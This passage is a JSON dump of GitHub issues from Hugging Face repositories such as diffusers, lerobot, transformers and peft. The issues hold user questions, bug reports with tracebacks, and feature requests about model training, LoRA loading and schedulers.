12084, "title": "Will `cosmos-transfer1` be supported in diffusers in the future?", "body": "\nHi @a-r-r-o-w and @yiyixuxu :) \n\nFirst of all, thank you for recently enabling cosmos-predict1 models (text2world and video2world) in the diffusers library \u2014 it's super exciting to see them integrated!\n\nI was wondering if there are any plans to also support [cosmos-transfer1](https://github.com/nvidia-cosmos/cosmos-transfer1) in diffusers in the future?\n\nThanks again for your great work! \ud83d\ude4c", "url": "https://github.com/huggingface/diffusers/issues/12084", "state": "open", "labels": [], "created_at": "2025-08-06T11:22:28Z", "updated_at": "2025-08-19T12:11:33Z", "comments": 3, "user": "rebel-shshin" }, { "repo": "huggingface/lerobot", "number": 1683, "title": "SmolVLMWithExpertModel", "body": "Excuse me, I would like to know about each module. In this class, I would like to know how to define inputs.", "url": "https://github.com/huggingface/lerobot/issues/1683", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-08-06T10:30:21Z", "updated_at": "2025-08-12T08:52:21Z", "user": "xjushengjie" }, { "repo": "huggingface/lerobot", "number": 1674, "title": "How to train smolvla for multi-task", "body": "I have trained smolvla for aloha_sim_transfer_cube and aloha_sim_insertion, and smolvla performs well in each single task. Now I'd like to train smolvla for multi-task ---- one model can complete the two tasks above. What should I do Now? ", "url": "https://github.com/huggingface/lerobot/issues/1674", "state": "closed", "labels": [], "created_at": "2025-08-06T02:40:01Z", "updated_at": "2025-10-15T02:52:29Z", "user": "w673" }, { "repo": "huggingface/diffusers", "number": 12079, "title": "API Suggestion: Expose Methods to Convert to Sample Prediction in Schedulers", "body": "**What API design would you like to have changed or added to the library? Why?**\n\nMy proposal is for schedulers to expose `convert_to_sample_prediction` and `convert_to_prediction_type` methods, which would do the following:\n\n1. `convert_to_sample_prediction`: Converts from a given `prediction_type` to `sample_prediction` (e.g. $x_0$-prediction). This function would accept a `prediction_type` argument which defaults to `self.config.prediction_type`.\n2. `convert_to_prediction_type`: Converts back from `sample_prediction` to the scheduler's `prediction_type`. This is intended to be the inverse function of `convert_to_sample_prediction`.\n\nThe motivating use case I have in mind is to support guidance strategies such as [Adaptive Projected Guidance (APG)](https://arxiv.org/abs/2410.02416) and [Frequency-Decoupled Guidance (FDG)](https://arxiv.org/abs/2506.19713) which prefer to operate with sample / $x_0$-predictions. A code example will be given below.\n\nThe reason I think schedulers should expose these methods explicitly is that performing these operations depend on the scheduler state and definition. For example, the prediction type conversion code in `EulerDiscreteScheduler` depends on the `self.sigmas` schedule:\n\nhttps://github.com/huggingface/diffusers/blob/ba2ba9019f76fd96c532240ed07d3f98343e4041/src/diffusers/schedulers/scheduling_euler_discrete.py#L650-L663\n\nAs a possible alternative, code that uses a scheduler could instead try to infer the prediction type conversion logic from the presence of `alphas_cumprod` (for a DDPM-style conversion) or `sigmas` (for an EDM-style conversion) attributes. However, I think this is unreliable because a scheduler could use `alphas_cumprod` or `sigmas` in a non-standard way. Since schedulers essentially already implement the `convert_to_sample_prediction` logic in their `step` methods, I think it could be relatively easy to implement these methods, and calling code would not have to guess how to do the conversion.\n\nA potential difficulty is ensuring that these methods work well with the `step` method, for example if they are called outside of a denoising loop (so internal state like `self.step_index` may not be properly initialized) or if the conversion can be non-deterministic (for example, when `gamma > 0` in `EulerDiscreteScheduler`).\n\n**What use case would this enable or better enable? Can you give us a code example?**\n\nThe motivating use case is to support guidance strategies which prefer to operate with $x_0$-predictions. For this use case, we want to convert the denoising model prediction to `sample_prediction`, run the guider's `__call__` logic, and then convert back to the scheduler's `prediction_type` (as schedulers currently expect `model_outputs` in that `prediction_type`).\n\nThere may be other potential use cases as well that I haven't thought of.\n\nAs a concrete example, we can imagine modifying `EulerDiscreteScheduler` as follows:\n\n```python\nclass EulerDiscreteScheduler(SchedulerMixin, ConfigMixin):\n ...\n def convert_to_sample_prediction(\n self,\n model_output: torch.Tensor,\n timestep: Union[float, torch.Tensor],\n sample: torch.Tensor,\n prediction_type: Optional[str] = None,\n s_churn: float = 0.0,\n s_tmin: float = 0.0,\n s_tmax: float = float(\"inf\"),\n s_noise: float = 1.0,\n generator: Optional[torch.Generator] = None,\n ) -> torch.Tensor:\n if prediction_type is None:\n prediction_type = self.config.prediction_type\n\n # NOTE: there's a potential catch here if self.step_index isn't properly initialized\n sigma = self.sigmas[self.step_index]\n gamma = min(s_churn / (len(self.sigmas) - 1), 2**0.5 - 1) if s_tmin <= sigma <= s_tmax else 0.0\n sigma_hat = sigma * (gamma + 1)\n\n # NOTE: another potential problem is ensuring consistent computation with `step` if the conversion\n # can be non-deterministic (as below)\n if gamma > 0:\n noise = randn_tensor(\n model_output.shape, dtype=model_output.dtype, device=model_output.device, generator=generator\n )\n eps = noise * s_noise\n sample = sample + eps * (sigma_hat**2 - sigma**2) ** 0.5\n\n # Compute predicted original sample (x_0) from sigma-scaled predicted noise\n # NOTE: \"original_sample\" should not be an expected prediction_type but is left in for\n # backwards compatibility\n if self.config.prediction_type == \"original_sample\" or self.config.prediction_type == \"sample\":\n pred_original_sample = model_output\n elif self.config.prediction_type == \"epsilon\":\n pred_original_sample = sample - sigma_hat * model_output\n elif self.config.prediction_type == \"v_prediction\":\n # denoised = model_output * c_out + input * c_skip\n pred_original_sample = model_output * (-sigma / (sigma**2 + 1) ** 0.5) + (sample / (sigma**2 + 1))\n else:\n raise Valu", "url": "https://github.com/huggingface/diffusers/issues/12079", "state": "open", "labels": [], "created_at": "2025-08-06T02:24:46Z", "updated_at": "2025-08-06T02:24:46Z", "comments": 0, "user": "dg845" }, { "repo": "huggingface/candle", "number": 3047, "title": "Can the safetensor files from OpenAI's new gpt-oss-20b work with any existing setup?", "body": "Is the new gpt-oss-20b a totally different architecture or can I use an existing candle setup, swap out the files and start playing around with gpt-oss-20b?\n", "url": "https://github.com/huggingface/candle/issues/3047", "state": "open", "labels": [], "created_at": "2025-08-06T01:59:59Z", "updated_at": "2025-08-06T02:01:52Z", "comments": 1, "user": "zcourts" }, { "repo": "huggingface/diffusers", "number": 12078, "title": "Problem with provided example validation input in the Flux Control finetuning example", "body": "### Describe the bug\n\nThe help page for the Flux control finetuning example, https://github.com/huggingface/diffusers/blob/main/examples/flux-control/README.md, provides a sample validation input, a pose condition image\n[]().\nThe pose conditioned model trained by the script does not process this image properly because it is in BGR format, apparent when comparing it to the openpose spec: \n[]().\nIt doesn't appear that the validation image is loaded in BGR format properly, in the below line:\nhttps://github.com/huggingface/diffusers/blob/ba2ba9019f76fd96c532240ed07d3f98343e4041/examples/flux-control/train_control_lora_flux.py#L127.\n\nIn my personal experiments, the validation output does not make sense. Below is an example of what my run uploaded to wandb:\n\n\"Image\"\n\n### Reproduction\n\nI ran the below in the command line: \n```\naccelerate launch --config_file=/mnt/localssd/huggingface/accelerate/deepspeed.yaml train_control_lora_flux.py \\\n --pretrained_model_name_or_path=\"black-forest-labs/FLUX.1-dev\" \\\n --dataset_name=\"raulc0399/open_pose_controlnet\" \\\n --output_dir=\"/mnt/localssd/pose-control-lora\" \\\n --mixed_precision=\"bf16\" \\\n --train_batch_size=1 \\\n --rank=64 \\\n --gradient_accumulation_steps=4 \\\n --gradient_checkpointing \\\n --use_8bit_adam \\\n --learning_rate=1e-4 \\\n --report_to=\"wandb\" \\\n --lr_scheduler=\"constant\" \\\n --lr_warmup_steps=0 \\\n --max_train_steps=5000 \\\n --validation_image=\"openpose.png\" \\\n --validation_prompt=\"A couple, 4k photo, highly detailed\" \\\n --seed=\"0\" \\\n --cache_dir=\"/mnt/localssd/huggingface\" \n```\n\n\n### Logs\n\n```shell\n\n```\n\n### System Info\n\n```\n- \ud83e\udd17 Diffusers version: 0.34.0\n- Platform: Linux-5.10.223-212.873.amzn2.x86_64-x86_64-with-glibc2.35\n- Running on Google Colab?: No\n- Python version: 3.10.8\n- PyTorch version (GPU?): 2.7.1+cu126 (True)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Huggingface_hub version: 0.34.3\n- Transformers version: 4.54.1\n- Accelerate version: 1.9.0\n- PEFT version: 0.17.0\n- Bitsandbytes version: 0.46.1\n- Safetensors version: 0.5.3\n- xFormers version: not installed\n- Accelerator: NVIDIA A100-SXM4-80GB, 81920 MiB\nNVIDIA A100-SXM4-80GB, 81920 MiB\nNVIDIA A100-SXM4-80GB, 81920 MiB\nNVIDIA A100-SXM4-80GB, 81920 MiB\nNVIDIA A100-SXM4-80GB, 81920 MiB\nNVIDIA A100-SXM4-80GB, 81920 MiB\nNVIDIA A100-SXM4-80GB, 81920 MiB\nNVIDIA A100-SXM4-80GB, 81920 MiB\n- Using GPU in script?: Yes.\n- Using distributed or parallel set-up in script?: Yes.\n```\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/12078", "state": "open", "labels": [ "bug" ], "created_at": "2025-08-05T22:29:35Z", "updated_at": "2025-08-07T08:47:45Z", "comments": 1, "user": "kzhang2" }, { "repo": "huggingface/lerobot", "number": 1672, "title": "How to resume training?", "body": "My old setting of training:\n```\n# batch_size: 64\nsteps: 20000\n# output_dir: outputs/train\n```\nin outputs/train/ there are 020000 folder and last folder,eash has pretrained_model and training_state\n\n\nWhen I want to resume training, I read configs/train.py\n\nso I set\n```\nresume: true\noutput_dir: outputs/train/\n# or output_dir: outputs/train/checkpoints/last/pretrained_model/\n# or output_dir: outputs/train/checkpoints/last/pretrained_model/train_config.json\n```\nAll got this:\n\nTraceback (most recent call last):\n File \"/miniconda3/envs/lerobot/lib/python3.10/runpy.py\", line 196, in _run_module_as_main\n return _run_code(code, main_globals, None,\n File \"miniconda3/envs/lerobot/lib/python3.10/runpy.py\", line 86, in _run_code\n exec(code, run_globals)\n File \"//code/lerobot_diy/src/lerobot/scripts/train.py\", line 394, in \n train()\n File \"/code/lerobot_diy/src/lerobot/configs/parser.py\", line 225, in wrapper_inner\n response = fn(cfg, *args, **kwargs)\n File \"/code/lerobot_diy/src/lerobot/scripts/train.py\", line 215, in train\n optimizer, lr_scheduler = make_optimizer_and_scheduler(cfg, policy)\n File \"//code/lerobot_diy/src/lerobot/optim/factory.py\", line 38, in make_optimizer_and_scheduler\n optimizer = cfg.optimizer.build(params)\nAttributeError: 'NoneType' object has no attribute 'build'\n\n\nHow to write command of output dir?\nThanks!", "url": "https://github.com/huggingface/lerobot/issues/1672", "state": "closed", "labels": [], "created_at": "2025-08-05T14:57:32Z", "updated_at": "2025-08-06T03:04:28Z", "user": "milong26" }, { "repo": "huggingface/transformers", "number": 39921, "title": "[Gemma3N] Not able to add new special tokens to model/tokenizer due to projection error", "body": "### System Info\n\n```\n- transformers==4.54.1\n- Platform: Linux-5.15.0-1084-aws-x86_64-with-glibc2.31\n- Python version: 3.13\n- TRL version: 0.19.1\n- Huggingface_hub version: 0.33.4\n- Safetensors version: 0.5.3\n- Accelerate version: 1.9.0\n- Accelerate config: \tnot found\n- DeepSpeed version: not installed\n- PyTorch version (accelerator?): 2.7.1+cu126 (CUDA)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: \n- Using GPU in script?: \n- GPU type: NVIDIA H100 80GB HBM3\n```\n\nHi,\n\nThe transformers model class for 'gemma-3n` has issues as below (pasting stacktrace):\n\n```\n trainer.train()\n ~~~~~~~~~~~~~^^\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/transformers/trainer.py\", line 2237, in train\n return inner_training_loop(\n args=args,\n ...<2 lines>...\n ignore_keys_for_eval=ignore_keys_for_eval,\n )\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/transformers/trainer.py\", line 2578, in _inner_training_loop\n tr_loss_step = self.training_step(model, inputs, num_items_in_batch)\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/trl/trainer/sft_trainer.py\", line 914, in training_step\n return super().training_step(*args, **kwargs)\n ~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/transformers/trainer.py\", line 3792, in training_step\n loss = self.compute_loss(model, inputs, num_items_in_batch=num_items_in_batch)\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/trl/trainer/sft_trainer.py\", line 868, in compute_loss\n (loss, outputs) = super().compute_loss(\n ~~~~~~~~~~~~~~~~~~~~^\n model, inputs, return_outputs=True, num_items_in_batch=num_items_in_batch\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n )\n ^\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/transformers/trainer.py\", line 3879, in compute_loss\n outputs = model(**inputs)\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/torch/nn/modules/module.py\", line 1751, in _wrapped_call_impl\n return self._call_impl(*args, **kwargs)\n ~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/torch/nn/modules/module.py\", line 1762, in _call_impl\n return forward_call(*args, **kwargs)\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/accelerate/utils/operations.py\", line 818, in forward\n return model_forward(*args, **kwargs)\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/accelerate/utils/operations.py\", line 806, in __call__\n return convert_to_fp32(self.model_forward(*args, **kwargs))\n ~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/torch/amp/autocast_mode.py\", line 44, in decorate_autocast\n return func(*args, **kwargs)\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/peft/peft_model.py\", line 1850, in forward\n return self.base_model(\n ~~~~~~~~~~~~~~~^\n input_ids=input_ids,\n ^^^^^^^^^^^^^^^^^^^^\n ...<6 lines>...\n **kwargs,\n ^^^^^^^^^\n )\n ^\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/torch/nn/modules/module.py\", line 1751, in _wrapped_call_impl\n return self._call_impl(*args, **kwargs)\n ~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/torch/nn/modules/module.py\", line 1762, in _call_impl\n return forward_call(*args, **kwargs)\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/peft/tuners/tuners_utils.py\", line 222, in forward\n return self.model.forward(*args, **kwargs)\n ~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/transformers/utils/generic.py\", line 961, in wrapper\n output = func(self, *args, **kwargs)\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/transformers/models/gemma3n/modeling_gemma3n.py\", line 2276, in forward\n outputs = self.model(\n input_ids=input_ids,\n ...<14 lines>...\n **lm_kwargs,\n )\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/torch/nn/modules/module.py\", line 1751, in _wrapped_call_impl\n return self._call_impl(*args, **kwargs)\n ~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13/site-packages/torch/nn/modules/module.py\", line 1762, in _call_impl\n return forward_call(*args, **kwargs)\n File \"/teamspace/studios/this_studio/.venv/lib/python3.13", "url": "https://github.com/huggingface/transformers/issues/39921", "state": "open", "labels": [ "Usage", "Good Second Issue", "bug" ], "created_at": "2025-08-05T14:43:37Z", "updated_at": "2025-08-19T19:37:39Z", "comments": 14, "user": "debasisdwivedy" }, { "repo": "huggingface/transformers", "number": 39910, "title": "Question: Llama4 weight reshaping", "body": "Hi all\n\nI am trying to extract the original Llama4 MoE weights, specifically:\n\n- `experts.w1` (aka `experts.moe_w_in_eD_F`)\n- `experts.w3` (aka `experts.moe_w_swiglu_eD_F`)\n\nI need both of these in the shape `[E, D, N]`, where:\n\n- E is the number of experts (16 for Scout)\n- D is the embedding dimension (5120)\n- N is the intermediate dimension (8192)\n\nI tried just splitting `experts.gate_up_proj` in half along the last dimension to get w1 and w3, but although the dimensions match, the model is outputting nonsense, so I assume the actual order of the weights is wrong.\n\nCould someone help me make sense of this snippet (from `convert_llama4_weights_to_hf`)?\nWhy is this hard coded indexing / reshaping being done and do you have any suggestions for how to get the original weight back?\n\n```python\nelif re.search(r\"(gate|up)_proj\", new_key):\n path = new_key.split(\".\")\n gate_key = re.sub(r\"(gate|up)_proj\", lambda m: \"gate_proj\", new_key)\n up_key = re.sub(r\"(gate|up)_proj\", lambda m: \"up_proj\", new_key)\n if gate_key == new_key:\n state_dict[new_key] = torch.cat(current_parameter, dim=concat_dim)\n elif new_key == up_key:\n if \"experts\" not in new_key:\n state_dict[new_key] = torch.cat(current_parameter, dim=concat_dim)\n else:\n # gate_proj = moe_w_in_eD_F = w1\n gate_proj = state_dict.pop(gate_key)\n gate_proj = [\n gate_proj.reshape(num_experts, -1, 8, 1024)[:, :, k, :].reshape(num_experts, -1, 1024)\n for k in range(8)\n ]\n gate_proj = torch.cat(gate_proj, dim=-1)\n\n # up_proj = moe_w_swiglu_eD_F = w3\n up_proj = [\n k.reshape(num_experts, -1, 8, 1024).reshape(num_experts, -1, 1024)\n for k in current_parameter\n ]\n up_proj = torch.cat(up_proj, dim=-1)\n\n gate_up_proj = torch.cat((gate_proj, up_proj), dim=-1)\n new_key = new_key.replace(\"up_proj\", \"gate_up_proj\")\n state_dict[new_key] = gate_up_proj.contiguous()\n\n tqdm.write(f\"Processing: {key.ljust(50)} ->\\t {new_key}, {state_dict[new_key].shape}\")\n```\n\nThank you!", "url": "https://github.com/huggingface/transformers/issues/39910", "state": "closed", "labels": [], "created_at": "2025-08-05T10:19:25Z", "updated_at": "2025-08-13T09:35:52Z", "comments": 0, "user": "gskorokhod" }, { "repo": "huggingface/datasets", "number": 7724, "title": "Can not stepinto load_dataset.py?", "body": "I set a breakpoint in \"load_dataset.py\" and try to debug my data load codes, but it does not stop at any breakpoints, so \"load_dataset.py\" can not be stepped into ?\n\n", "url": "https://github.com/huggingface/datasets/issues/7724", "state": "open", "labels": [], "created_at": "2025-08-05T09:28:51Z", "updated_at": "2025-08-05T09:28:51Z", "comments": 0, "user": "micklexqg" }, { "repo": "huggingface/lerobot", "number": 1670, "title": "How does leroBot address the issue of training heterogeneous datasets?", "body": "Specifically, suppose I have a dataset A and dataset B. In dataset A, both the state and action are represented as (x, y, z, gripper), where x, y, and z denote the distances moved along the x, y, and z axes, respectively, and gripper represents the on/off state of the gripper. In dataset B, both the state and action are the angles of the corresponding joints of the robotic arm. How can I use these two datasets together for training?", "url": "https://github.com/huggingface/lerobot/issues/1670", "state": "open", "labels": [ "question", "processor" ], "created_at": "2025-08-05T08:20:08Z", "updated_at": "2025-08-12T09:01:57Z", "user": "mahao18cm" }, { "repo": "huggingface/lerobot", "number": 1667, "title": "How many episode to have a good result of SmolVLA", "body": "### System Info\n\n```Shell\nHello, I'm trying to do a simple task like dual hand pick banana to a basket using SmolVLA\uff0cmay I know how many episode to train for having a good result\uff1f\n\nMany thanks\nJulien\n```\n### Reproduction\n\nI've used 100 episode for training, looks like the arm can not pick the banana accurately, sometimes the arms just stay on the head of banana\n\n### Expected behavior\n\nleft hand pick banana and hand it to right hand then right hand put banana into basket", "url": "https://github.com/huggingface/lerobot/issues/1667", "state": "closed", "labels": [ "question", "policies" ], "created_at": "2025-08-05T05:12:12Z", "updated_at": "2025-10-17T11:27:14Z", "user": "chejulien" }, { "repo": "huggingface/lerobot", "number": 1666, "title": "Please add multi gpu training support", "body": "MultiGPU training currently does not work with lerobot as mentioned here https://github.com/huggingface/lerobot/issues/1377\n\nPlease add this support.", "url": "https://github.com/huggingface/lerobot/issues/1666", "state": "closed", "labels": [ "enhancement", "question", "policies" ], "created_at": "2025-08-04T18:06:40Z", "updated_at": "2025-10-17T09:53:59Z", "user": "nahidalam" }, { "repo": "huggingface/lerobot", "number": 1663, "title": "No way to train on subset of features", "body": "Currently, when loading a policy from a config.json, the input_features seem to be ignored and re-generated from the dataset provided. However, it may not always be desirable to train on all features, perhaps if I have multiple camera views but I only want to train on one.\n\nI would prefer that config.json features are not overwritten, but this would be a breaking change. Do you have suggestions on how we could implement this behavior?", "url": "https://github.com/huggingface/lerobot/issues/1663", "state": "open", "labels": [ "question", "policies", "processor" ], "created_at": "2025-08-04T15:19:35Z", "updated_at": "2025-08-12T09:03:47Z", "user": "atyshka" }, { "repo": "huggingface/diffusers", "number": 12060, "title": "Is there any DiT block defined in the huggingface/diffusers OR huggingface/transformers project?", "body": "**Is your feature request related to a problem? Please describe.**\nI want to make some experiments about DiT based flow-matching model, I need an implementation of the common DiT block, but did not found it in both huggingface/diffusers and huggingface/transformers. Is there any implementation about it with just some other file names?\n\n**Describe the solution you'd like.**\nA clear DiT implementation\n\n**Describe alternatives you've considered.**\n\n\n**Additional context.**\n\n", "url": "https://github.com/huggingface/diffusers/issues/12060", "state": "open", "labels": [], "created_at": "2025-08-04T09:40:43Z", "updated_at": "2025-08-04T10:19:00Z", "comments": 2, "user": "JohnHerry" }, { "repo": "huggingface/diffusers", "number": 12052, "title": "Wan 2.2 with LightX2V offloading tries to multiply tensors from different devices and fails", "body": "### Describe the bug\n\nAfter @sayakpaul great work in https://github.com/huggingface/diffusers/pull/12040 LightX2V now works. However what doesn't work is adding both a lora and offloading to the transformer_2. I can get away with either (i.e. offload both transformers but add a lora only to transformer and NOT to transformer_2, OR offload just transformer and add a lora to both transformer_2 and transformer). \n\nHowever offloading transformer_2 is quite important, since it causes 2x the VRAM to be used, and even a Q4_K_S model with LightX2V will use >24gb vram (as opposed to <9GB VRAM as in ComfyUI).\n\n### Reproduction\n\nThe script is the same as the one posted by Paul in the #12040 PR with the addition of offloading\n\n```python\nimport torch\nfrom diffusers import WanImageToVideoPipeline\nfrom huggingface_hub import hf_hub_download\nimport requests\nfrom PIL import Image\nfrom diffusers.loaders.lora_conversion_utils import _convert_non_diffusers_wan_lora_to_diffusers\nfrom io import BytesIO\nimport safetensors.torch\n\n# Load a basic transformer model\npipe = WanImageToVideoPipeline.from_pretrained(\n \"Wan-AI/Wan2.2-I2V-A14B-Diffusers\",\n torch_dtype=torch.bfloat16\n)\n\nlora_path = hf_hub_download(\n repo_id=\"Kijai/WanVideo_comfy\",\n filename=\"Lightx2v/lightx2v_I2V_14B_480p_cfg_step_distill_rank128_bf16.safetensors\"\n)\n\n# This is what is different\n\nself.pipe.vae.enable_group_offload(onload_device=onload_device, offload_device=offload_device, offload_type=\"leaf_level\")\nself.pipe.transformer.enable_group_offload(onload_device=onload_device, offload_device=offload_device, offload_type=\"leaf_level\")\n\n# Without this line it works but uses 2x the VRAM\nself.pipe.transformer_2.enable_group_offload(onload_device=onload_device, offload_device=offload_device, offload_type=\"leaf_level\")\n\nself.pipe.text_encoder.enable_group_offload(onload_device=onload_device, offload_device=offload_device, offload_type=\"leaf_level\")\n\npipe.to(\"cuda\")\n\npipe.load_lora_weights(lora_path)\n# print(pipe.transformer.__class__.__name__)\n# print(pipe.transformer.peft_config)\norg_state_dict = safetensors.torch.load_file(lora_path)\nconverted_state_dict = _convert_non_diffusers_wan_lora_to_diffusers(org_state_dict)\npipe.transformer_2.load_lora_adapter(converted_state_dict)\n\nimage_url = \"https://cloud.inference.sh/u/4mg21r6ta37mpaz6ktzwtt8krr/01k1g7k73eebnrmzmc6h0bghq6.png\"\nresponse = requests.get(image_url)\ninput_image = Image.open(BytesIO(response.content)).convert(\"RGB\")\n\nframes = pipe(input_image, \"animate\", num_inference_steps=4, guidance_scale=1.0)\n```\n\n### Logs\n\n```shell\n[t+1m44s256ms] [ERROR] Traceback (most recent call last):\n[t+1m44s256ms] File \"/server/tasks.py\", line 50, in run_task\n[t+1m44s256ms] output = await result\n[t+1m44s256ms] ^^^^^^^^^^^^\n[t+1m44s256ms] File \"/inferencesh/apps/gpu/65b8e0w0x60df8we0x6njqx9kc/src/inference.py\", line 424, in run\n[t+1m44s256ms] output = self.pipe(\n[t+1m44s256ms] ^^^^^^^^^^\n[t+1m44s256ms] File \"/inferencesh/apps/gpu/65b8e0w0x60df8we0x6njqx9kc/venv/3.12/lib/python3.12/site-packages/torch/utils/_contextlib.py\", line 116, in decorate_context\n[t+1m44s256ms] return func(*args, **kwargs)\n[t+1m44s256ms] ^^^^^^^^^^^^^^^^^^^^^\n[t+1m44s256ms] File \"/inferencesh/apps/gpu/65b8e0w0x60df8we0x6njqx9kc/venv/3.12/lib/python3.12/site-packages/diffusers/pipelines/wan/pipeline_wan_i2v.py\", line 754, in __call__\n[t+1m44s256ms] noise_pred = current_model(\n[t+1m44s256ms] ^^^^^^^^^^^^^^\n[t+1m44s256ms] File \"/inferencesh/apps/gpu/65b8e0w0x60df8we0x6njqx9kc/venv/3.12/lib/python3.12/site-packages/torch/nn/modules/module.py\", line 1751, in _wrapped_call_impl\n[t+1m44s256ms] return self._call_impl(*args, **kwargs)\n[t+1m44s256ms] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[t+1m44s256ms] File \"/inferencesh/apps/gpu/65b8e0w0x60df8we0x6njqx9kc/venv/3.12/lib/python3.12/site-packages/torch/nn/modules/module.py\", line 1762, in _call_impl\n[t+1m44s256ms] return forward_call(*args, **kwargs)\n[t+1m44s256ms] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[t+1m44s256ms] File \"/inferencesh/apps/gpu/65b8e0w0x60df8we0x6njqx9kc/venv/3.12/lib/python3.12/site-packages/diffusers/hooks/hooks.py\", line 189, in new_forward\n[t+1m44s256ms] output = function_reference.forward(*args, **kwargs)\n[t+1m44s256ms] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n[t+1m44s256ms] File \"/inferencesh/apps/gpu/65b8e0w0x60df8we0x6njqx9kc/venv/3.12/lib/python3.12/site-packages/diffusers/models/transformers/transformer_wan.py\", line 639, in forward\n[t+1m44s256ms] temb, timestep_proj, encoder_hidden_states, encoder_hidden_states_image = self.condition_embedder(\n[t+1m44s256ms] ^^^^^^^^^^^^^^^^^^^^^^^^\n[t+1m44s256ms] File \"/inferencesh/apps/gpu/65b8e0w0x60df8we0x6njqx9kc/venv/3.12/lib/python3.12/site-packages/torch/nn/modules/module.py\", line 1751, in _wrapped_call_impl\n[t+1m44s256ms] return self._", "url": "https://github.com/huggingface/diffusers/issues/12052", "state": "closed", "labels": [ "bug" ], "created_at": "2025-08-03T12:43:13Z", "updated_at": "2025-08-11T15:53:41Z", "comments": 4, "user": "luke14free" }, { "repo": "huggingface/peft", "number": 2699, "title": "UserWarning: Found missing adapter keys while loading the checkpoint", "body": "I have been fine-tuning different LLM models (mainly Llama family) since last year and use peft with lora config all the time with no issues. \nJust recently I was fine-tuning the llama 70B on multiple GPU using accelerate then saving the adapter once training is done. (This was always my setup since last year)\n\nHowever now I want to load the adapter into the base model as follows:\n\n```\nbase_model = AutoModelForCausalLM.from_pretrained(model_id, dtype= torch.float16, device_map = 'auto', attn_implementation = 'flash_attention_2')\n\nmodel = PeftModel.from_pretrained(base_model, adapter_path)\n```\nNow I am getting this warning:\n```\nUserWarning: Found missing adapter keys while loading the checkpoint: \n```\nThen it lists some Lora weights. I tried changing LoraConfig parameters but still the problem\nPersists.\nCan anyone please tell me what is the issue here and how to fix it.\n\nI am using the latest version of peft, transformers, accelerate,\ntrl\n\nNote: I am also using the same format for model during the training and inference.\n\nI have already looked at this and seems same issue, but I load my model using AutoModelForCasaulLM in both cases:\nhttps://github.com/huggingface/peft/issues/2566\n\n\nNote: This is the warning: `[base_model.model.model.layers.0.self_attn, q_proj.lora_A.default.weight, base_model.model.model.layers.0.self_attn, q_proj.lora_B.default.weight, base_model.model.model.layers.0.self_attn, k_proj.lora_A.default.weight, base_model.model.model.layers.0.self_attn, k_proj.lora_B.default.weight`, ...", "url": "https://github.com/huggingface/peft/issues/2699", "state": "closed", "labels": [], "created_at": "2025-08-02T20:49:31Z", "updated_at": "2025-11-09T15:03:46Z", "comments": 41, "user": "manitadayon" }, { "repo": "huggingface/diffusers", "number": 12044, "title": "AttributeError: 'bool' object has no attribute '__module__'. Did you mean: '__mod__'?", "body": "I am train the Flux.1-dev model and get this error. I found the solution to bring diffuser to version 0.21.0 but then it would beconflict with some other libraries. Is there any solution for this?\n\n```\nTraceback (most recent call last):\n File \"/home/quyetnv/t2i/ai-toolkit/run.py\", line 120, in \n main()\n File \"/home/quyetnv/t2i/ai-toolkit/run.py\", line 108, in main\n raise e\n File \"/home/quyetnv/t2i/ai-toolkit/run.py\", line 96, in main\n job.run()\n File \"/home/quyetnv/t2i/ai-toolkit/jobs/ExtensionJob.py\", line 22, in run\n process.run()\n File \"/home/quyetnv/t2i/ai-toolkit/jobs/process/BaseSDTrainProcess.py\", line 1518, in run\n self.sd.load_model()\n File \"/home/quyetnv/t2i/ai-toolkit/toolkit/stable_diffusion_model.py\", line 788, in load_model\n pipe: Pipe = Pipe(\n File \"/home/quyetnv/.venv/lib/python3.10/site-packages/diffusers/pipelines/flux/pipeline_flux.py\", line 197, in __init__\n self.register_modules(\n File \"/home/quyetnv/.venv/lib/python3.10/site-packages/diffusers/pipelines/pipeline_utils.py\", line 212, in register_modules\n library, class_name = _fetch_class_library_tuple(module)\n File \"/home/quyetnv/.venv/lib/python3.10/site-packages/diffusers/pipelines/pipeline_loading_utils.py\", line 877, in _fetch_class_library_tuple\n library = not_compiled_module.__module__.split(\".\")[0]\nAttributeError: 'bool' object has no attribute '__module__'. Did you mean: '__mod__'?\n``` \nmy version diffusers was installed from requirement of 